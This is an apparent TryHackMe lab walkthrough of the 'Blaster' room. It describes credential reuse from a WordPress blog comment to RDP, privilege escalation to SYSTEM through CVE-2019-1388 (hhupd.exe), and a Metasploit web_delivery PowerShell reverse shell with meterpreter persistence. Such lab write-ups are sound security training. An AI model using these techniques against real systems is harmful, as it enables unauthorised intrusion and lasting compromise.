Blaster - TryHackMe Writeup
The link for this lab is located here: https://tryhackme.com/room/blaster
Throughout this room, we'll be looking at alternative modes of exploitation without the use of Metasploit or really exploitation tools in general beyond nmap and dirbuster.
Full Walkthrough
The first thing we do is run an Nmap scan on all the ports to determine the open ports with the following parameters:
-p- for all ports
10.10.105.65 for the target IP
-oN allports.scan to output to a file
This returns that two ports are open - 80 (HTTP) and 3389 (RDP). With this information, we can perform a more detailed scan to try and enumerate the services a bit more.
We get some information back but not a lot. We see that port 80 is running an IIS Windows Server.
The first thing we can do is check what the website is running.
The static IIS default page exists - there’s no real website here. As we don’t know any credentials for the RDP service, we can begin to enumerate the website more.
For starters, we can run a directory busting tool like Feroxbuster to try and identify hidden directories.
This returns a hidden directory - /retro. Let’s check it out!
This looks more like a website - something like a blog site. Looking at the main page, there is something that immediately stands out to me - the author of the first blog post.
Here, we can see that someone called “Wade” is writing these blog posts - could this be a potential username?
To enumerate further, we can click on the name to see his profile.
We can see all the blogs posts that this user has made. Clicking through each one, there is an interesting comment on the “Ready Player One” post.
It looks like Wade left himself a note of “parzival” - this to me looks like a password. With these potential credentials, we can try and find a login page.
At the bottom of the site, we see the following:
It’s a link to a login panel. Clicking it reveals a WordPress login panel.
Using the credentials we found - wade:parzival - we can attempt to log in.
It works and we get access to the WordPress admin panel. From here, there are tons of malicious things we can do (i.e. a reverse shell).
However, as credential reuse is one of the main offenders in the security world, what happens if we try these same credentials on the RDP service running?
Bingo! We get a nice GUI interface and we have access to the user’s desktop immediately. On the desktop, we can see the user.txt flag which we can open and submit.
From here, there is an interesting file sitting on the desktop - an executable titled “hhupd" which seems abnormal.
Doing some googling of this program, it seems to relate to a CVE-2019-1388 vulnerability. More importantly, it seems as if this vulnerability is relating to privilege escalation - juicy!
Doing some more research, it allows an attacker to elevate privileges to SYSTEM easily.
I found a good GitHub page that details the steps we need to do in order to elevate our privileges.
First, we need to run the program to ensure the UAC pops up -i.e. the hhupd.exe program.
Once UAC is popped, we click on “Show more details” and the following appears.
Once we click that, it takes us to the certificate properties with a link in the “Issued by” section.
After it opens, we can close the UAC. Clicking this link opens an Internet Explorer page running as the SYSTEM user.
To abuse this, we can save this page to open the File Explorer.
An error appears which we can ignore.
Then, to get a shell, we can navigate to C:\Windows\System32 to list out all the files inside - including cmd.exe.
Once we are in that directory and found the cmd.exe executable, we can right click it and select “Open”.
This spawns a shell running as NT AUTHORITY\SYSTEM. We have successfully elevated our privileges.
From here, we can try and get a better shell like Meterpreter or even a C2 Framework like Cobalt Strike or Sliver. For this, I will simply use Metasploit.
We can first enumerate to see what antivirus is being used - in this case, it is simply Windows Defender and it is turned on.
Next, we can start the Metasploit Framework by running “msfconsole”.
Then, instead of just putting an executable on the Desktop, we can utilize the web_delivery module that generates a command for us that we can run on the target system.
First, we change the target to PSH (PowerShell) as we are on a Windows machine so Python probably is not installed.
Then, we set the LHOST (our machine) and LPORT.
Finally, we set the PAYLOAD to a simple meterpreter reverse HTTP shell.
To generate the command, we simply run it and it spits out this long PowerShell command that we can execute.
Going back to the SYSTEM command prompt we have through the RDP session and running the command opens up a Meterpreter session for.
Then, we can hop into it by typing “sessions -i 1”. As you can see, it is running as the SYSTEM user meaning we have full access.
Finally, if we wanted persistence, we could simply run “run persistence -X” through the meterpreter shell which would provide us persistence if the machine was to go down or get rebooted.